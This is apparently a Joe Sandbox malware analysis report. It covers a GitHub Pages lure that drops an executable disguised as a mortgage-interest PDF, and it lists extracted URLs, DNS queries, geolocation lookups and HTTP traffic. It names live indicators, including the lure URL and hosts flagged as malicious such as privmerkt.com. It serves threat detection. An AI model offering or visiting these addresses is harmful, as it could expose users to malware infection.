http://www.symantec.com/XMLSchema/dcs/disc-results	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gpn	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2331062452.0000000000DF6000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2313438225.0000000000DE7000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000002.2563583207.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://twitter.com/githubstatus	chromecache_74.1.dr	false	Avira URL Cloud: safe	unknown
http://www.drm-x.com/pdfversion.htm1.5.7.0..http://www.haihaisoft.com/PDF_Reader_download.aspxopenSo	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
https://getbootstrap.com/)	chromecache_75.1.dr	false	URL Reputation: safe	unknown
http://www.flashvidz.tk/Zenonprogram	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.kowalczyk.info/software/sumatrapdf/translations.htmlContribute	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://geoplugin.net/	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000002.2563583207.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.openssl.org/support/faq.html....................	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2324907056.0000000010375000.00000004.00001000.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2323953234.0000000010119000.00000002.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown
http://william.famille-blum.org/William	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0Digitized	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://mupdf.comMuPDFpdf	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://www.winimage.com/zLibDllbad	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/twbs/bootstrap/blob/master/LICENSE)	chromecache_75.1.dr	false	Avira URL Cloud: safe	unknown
http://www.winimage.com/zLibDll	MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
https://help.github.com/pages/	chromecache_74.1.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.68	www.google.com	United States	15169	GOOGLEUS	false
104.18.10.207	stackpath.bootstrapcdn.com	United States	13335	CLOUDFLARENETUS	false
216.58.212.164	unknown	United States	15169	GOOGLEUS	false
104.18.94.41	unknown	United States	13335	CLOUDFLARENETUS	false
104.18.95.41	challenges.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
140.82.121.4	github.com	United States	36459	GITHUBUS	false
185.199.111.133	raw.githubusercontent.com	Netherlands	54113	FASTLYUS	false
172.111.163.227	privmerkt.com	United States	32489	AMANAHA-NEWCA	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
185.199.108.153	maveuve.github.io	Netherlands	54113	FASTLYUS	false
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false

Private

IP
192.168.2.16

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1518509
Start date and time:	2024-09-25 18:43:57 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://maveuve.github.io/frlpodf/marynewreleasefax.html
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.win@37/33@21/12
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.227, 142.250.181.238, 74.125.71.84, 34.104.35.123, 93.184.221.240, 142.250.185.163, 142.250.184.238
Excluded domains from analysis (whitelisted): clients1.google.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://maveuve.github.io/frlpodf/marynewreleasefax.html

Input	Output
URL: https://maveuve.github.io/frlpodf/marynewreleasefax.html Model: jbxai	{ "brand":["CLOUDFLARE"], "contains_trigger_text":false, "trigger_text":"", "prominent_button_name":"unknown", "text_input_field_labels":["unknown"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://maveuve.github.io/frlpodf/marynewreleasefax.html Model: jbxai	{ "brand":["CLOUDFLARE"], "contains_trigger_text":false, "trigger_text":"", "prominent_button_name":"unknown", "text_input_field_labels":["unknown"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://maveuve.github.io/frlpodf/marynewreleasefax.html Model: jbxai	{ "brand":["Performance & Security"], "contains_trigger_text":false, "trigger_text":"", "prominent_button_name":"unknown", "text_input_field_labels":["unknown"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

Process:	C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.013811273052389
Encrypted:	false
SSDEEP:	12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
MD5:	18BC6D34FABB00C1E30D98E8DAEC814A
SHA1:	D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
SHA-256:	862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
SHA-512:	8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
Malicious:	false
Reputation:	low
Preview:	{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Sep 25 15:44:34 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.9875059660625958
Encrypted:	false
SSDEEP:	48:8mdkTIc4H2idAKZdA1FehwiZUklqehey+3:89fZxy
MD5:	CBA163034E087D35C9AFCF0DD3B253FA
SHA1:	39729153552909091E214599820182F01E6E4661
SHA-256:	AB945296C7C38F7F02F27D787CED4D904ED2D7C13DA5BC6896BFC83D7D725FFC
SHA-512:	673AAF5AA9D5510ECD05C7FE6570376623A18FDC28B02709305389A1C709FFD18A064021C8A0065351177A994009A20DFA32866D9532960D6EA5AE87FF650500
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......3j...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I9Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V9Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V9Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V9Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V9Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Zx.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 25, 2024 18:44:33.969532013 CEST	192.168.2.16	1.1.1.1	0xf04	Standard query (0)	maveuve.github.io	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:33.969775915 CEST	192.168.2.16	1.1.1.1	0xe13c	Standard query (0)	maveuve.github.io	65	IN (0x0001)	false
Sep 25, 2024 18:44:34.578258038 CEST	192.168.2.16	1.1.1.1	0xe861	Standard query (0)	challenges.cloudflare.com	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:34.578386068 CEST	192.168.2.16	1.1.1.1	0xe473	Standard query (0)	challenges.cloudflare.com	65	IN (0x0001)	false
Sep 25, 2024 18:44:34.578983068 CEST	192.168.2.16	1.1.1.1	0x48e9	Standard query (0)	stackpath.bootstrapcdn.com	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:34.579340935 CEST	192.168.2.16	1.1.1.1	0xd533	Standard query (0)	stackpath.bootstrapcdn.com	65	IN (0x0001)	false
Sep 25, 2024 18:44:36.023600101 CEST	192.168.2.16	1.1.1.1	0xebef	Standard query (0)	challenges.cloudflare.com	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:36.023771048 CEST	192.168.2.16	1.1.1.1	0x2ffb	Standard query (0)	challenges.cloudflare.com	65	IN (0x0001)	false
Sep 25, 2024 18:44:36.030777931 CEST	192.168.2.16	1.1.1.1	0xa41a	Standard query (0)	challenges.cloudflare.com	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:36.031382084 CEST	192.168.2.16	1.1.1.1	0x1a6f	Standard query (0)	challenges.cloudflare.com	65	IN (0x0001)	false
Sep 25, 2024 18:44:37.893003941 CEST	192.168.2.16	1.1.1.1	0x5176	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:37.893261909 CEST	192.168.2.16	1.1.1.1	0x3cde	Standard query (0)	www.google.com	65	IN (0x0001)	false
Sep 25, 2024 18:44:43.847181082 CEST	192.168.2.16	1.1.1.1	0xb667	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:43.847381115 CEST	192.168.2.16	1.1.1.1	0xcab8	Standard query (0)	github.com	65	IN (0x0001)	false
Sep 25, 2024 18:44:44.953789949 CEST	192.168.2.16	1.1.1.1	0x9061	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:44.953790903 CEST	192.168.2.16	1.1.1.1	0x2c51	Standard query (0)	raw.githubusercontent.com	65	IN (0x0001)	false
Sep 25, 2024 18:45:37.952076912 CEST	192.168.2.16	1.1.1.1	0x6e67	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:45:37.953454971 CEST	192.168.2.16	1.1.1.1	0xdb95	Standard query (0)	www.google.com	65	IN (0x0001)	false
Sep 25, 2024 18:46:11.633742094 CEST	192.168.2.16	1.1.1.1	0x3241	Standard query (0)	privmerkt.com	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:46:13.432986021 CEST	192.168.2.16	1.1.1.1	0x3797	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:46:42.535119057 CEST	192.168.2.16	1.1.1.1	0x614b	Standard query (0)	nwemarkets.com	A (IP address)	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 25, 2024 18:44:33.978354931 CEST	1.1.1.1	192.168.2.16	0xf04	No error (0)	maveuve.github.io	185.199.108.153	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:33.978354931 CEST	1.1.1.1	192.168.2.16	0xf04	No error (0)	maveuve.github.io	185.199.110.153	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:33.978354931 CEST	1.1.1.1	192.168.2.16	0xf04	No error (0)	maveuve.github.io	185.199.109.153	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:33.978354931 CEST	1.1.1.1	192.168.2.16	0xf04	No error (0)	maveuve.github.io	185.199.111.153	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:34.585227966 CEST	1.1.1.1	192.168.2.16	0xe861	No error (0)	challenges.cloudflare.com	104.18.95.41	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:34.585227966 CEST	1.1.1.1	192.168.2.16	0xe861	No error (0)	challenges.cloudflare.com	104.18.94.41	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:34.585968971 CEST	1.1.1.1	192.168.2.16	0x48e9	No error (0)	stackpath.bootstrapcdn.com	104.18.10.207	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:34.585968971 CEST	1.1.1.1	192.168.2.16	0x48e9	No error (0)	stackpath.bootstrapcdn.com	104.18.11.207	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:34.585983038 CEST	1.1.1.1	192.168.2.16	0xe473	No error (0)	challenges.cloudflare.com		65	IN (0x0001)	false
Sep 25, 2024 18:44:34.586968899 CEST	1.1.1.1	192.168.2.16	0xd533	No error (0)	stackpath.bootstrapcdn.com		65	IN (0x0001)	false
Sep 25, 2024 18:44:36.030577898 CEST	1.1.1.1	192.168.2.16	0xebef	No error (0)	challenges.cloudflare.com	104.18.94.41	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:36.030577898 CEST	1.1.1.1	192.168.2.16	0xebef	No error (0)	challenges.cloudflare.com	104.18.95.41	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:36.030947924 CEST	1.1.1.1	192.168.2.16	0x2ffb	No error (0)	challenges.cloudflare.com		65	IN (0x0001)	false
Sep 25, 2024 18:44:36.037759066 CEST	1.1.1.1	192.168.2.16	0xa41a	No error (0)	challenges.cloudflare.com	104.18.95.41	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:36.037759066 CEST	1.1.1.1	192.168.2.16	0xa41a	No error (0)	challenges.cloudflare.com	104.18.94.41	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:36.038389921 CEST	1.1.1.1	192.168.2.16	0x1a6f	No error (0)	challenges.cloudflare.com		65	IN (0x0001)	false
Sep 25, 2024 18:44:37.900578976 CEST	1.1.1.1	192.168.2.16	0x3cde	No error (0)	www.google.com		65	IN (0x0001)	false
Sep 25, 2024 18:44:37.900607109 CEST	1.1.1.1	192.168.2.16	0x5176	No error (0)	www.google.com	142.250.186.68	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:43.854125977 CEST	1.1.1.1	192.168.2.16	0xb667	No error (0)	github.com	140.82.121.4	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:44.960573912 CEST	1.1.1.1	192.168.2.16	0x9061	No error (0)	raw.githubusercontent.com	185.199.111.133	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:44.960573912 CEST	1.1.1.1	192.168.2.16	0x9061	No error (0)	raw.githubusercontent.com	185.199.109.133	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:44.960573912 CEST	1.1.1.1	192.168.2.16	0x9061	No error (0)	raw.githubusercontent.com	185.199.108.133	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:44:44.960573912 CEST	1.1.1.1	192.168.2.16	0x9061	No error (0)	raw.githubusercontent.com	185.199.110.133	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:45:37.959784031 CEST	1.1.1.1	192.168.2.16	0x6e67	No error (0)	www.google.com	216.58.212.164	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:45:37.960232973 CEST	1.1.1.1	192.168.2.16	0xdb95	No error (0)	www.google.com		65	IN (0x0001)	false
Sep 25, 2024 18:46:11.661901951 CEST	1.1.1.1	192.168.2.16	0x3241	No error (0)	privmerkt.com	172.111.163.227	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:46:13.483549118 CEST	1.1.1.1	192.168.2.16	0x3797	No error (0)	geoplugin.net	178.237.33.50	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:46:42.553538084 CEST	1.1.1.1	192.168.2.16	0x614b	No error (0)	nwemarkets.com	45.74.48.2	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 18:46:13.521801949 CEST	71	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Sep 25, 2024 18:46:14.182981968 CEST	1170	IN	HTTP/1.1 200 OK date: Wed, 25 Sep 2024 16:46:14 GMT server: Apache content-length: 962 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED] Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 18:46:44.870029926 CEST	71	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Sep 25, 2024 18:46:45.506354094 CEST	1170	IN	HTTP/1.1 200 OK date: Wed, 25 Sep 2024 16:46:45 GMT server: Apache content-length: 962 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED] Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:44:28 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-09-25 16:44:28 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF67) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=172906 Date: Wed, 25 Sep 2024 16:44:28 GMT Connection: close X-CID: 2

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:44:29 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-09-25 16:44:29 UTC	515	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=172851 Date: Wed, 25 Sep 2024 16:44:29 GMT Content-Length: 55 Connection: close X-CID: 2
2024-09-25 16:44:29 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:44:34 UTC	690	OUT	GET /frlpodf/marynewreleasefax.html HTTP/1.1 Host: maveuve.github.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
